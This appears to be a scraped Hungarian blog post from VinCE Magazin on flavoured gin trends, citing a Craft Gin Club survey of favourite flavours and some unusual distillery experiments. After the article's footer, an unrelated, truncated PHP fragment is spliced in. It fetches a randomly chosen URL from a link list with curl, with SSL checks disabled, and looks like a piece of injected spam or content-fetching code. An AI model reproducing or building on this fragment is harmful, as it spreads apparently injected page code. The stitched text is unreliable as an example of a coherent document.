Hét ízesített gin 2019-re

Korábban már írtunk róla, hogy a gin világszerte egyre népszerűbb ital, s hogy egyre több különböző ízesítése létezik. Legyen az csalán, sütemény vagy éppen tea – a fogyasztók körében egyre népszerűbbek a meglepő ízkombinációk. Fotó: idesh.net Az angliai Craft Gin Club – egy előfizetéses szolgáltatás kézműves és prémium ginek kedvelői számára – 3200 fős kutatást... View Article


Korábban már írtunk róla, hogy a gin világszerte egyre népszerűbb ital, s hogy egyre több különböző ízesítése létezik. Legyen az csalán, sütemény vagy éppen tea – a fogyasztók körében egyre népszerűbbek a meglepő ízkombinációk.

Fotó: idesh.net

Az angliai Craft Gin Club – egy előfizetéses szolgáltatás kézműves és prémium ginek kedvelői számára – 3200 fős kutatást végzett nemrég, hogy kiderítse, mely ízek érdeklik leginkább a vásárlókat.

Ezek voltak a legnépszerűbb ízek:

  1. Sós karamella – 31%
  2. Csalán – 16%
  3. Karácsonyi puding – 15%
  4. Yorkshire tea – 9%
  5. Trüffel – 8%
  6. Banános csokoládé – 6%
  7. Keksz – 3%

Néhány vadabb íz is felmerült az ötletek között, mint a gyömbér, az Earl Grey tea és a chili.

Fotó: Heather Christo

Egyre több lepárlóban használnak meglehetősen szokatlan aromákat és alapanyagokat a gin ízesítéséhez. A múlt hónapban például a híres dél-londoni gourmet-piac, a Borough Market társult az East London Liquor Companyval, és készítettek egy különleges karakterű gint édesköménnyel, zsályával és babérlevéllel ízesítve.

Az utóbbi idők talán legbizarrabb ötlete a Lingfield Park lóversenyre készült gin volt, melyhez nemcsak a birtokon termett növényeket, de egyenesen a lóversenypálya gyepét is felhasználták, a porcelánpalackba töltött (természetesen limitált mennyiségben készült) gint pedig a verseny győztese kapta trófea helyett.

Ahogy a lepárlók egyre kísérletezőbbekké válnak, egyre merészebb receptekkel és technológiákkal dolgoznak, úgy követik őket a fogyasztók is. A klasszikus gin tonik is egyre többféle variációban létezik már.

Fotó: Bon Appetit

Ami pedig a körítést illeti, a hagyományos citrom, lime és uborka már nem uralják a kategóriát. A válaszadók közel 40 százaléka grapefruittal issza a gint, kevesebb, és több mint 90 százalékuk folyamatosan kísérletezik kevéssé kézenfekvő kombinációkkal, például rebarbarával vagy szederrel.

Forrás: The Drinks Business

No visits yet

The post Hét ízesített gin 2019-re appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>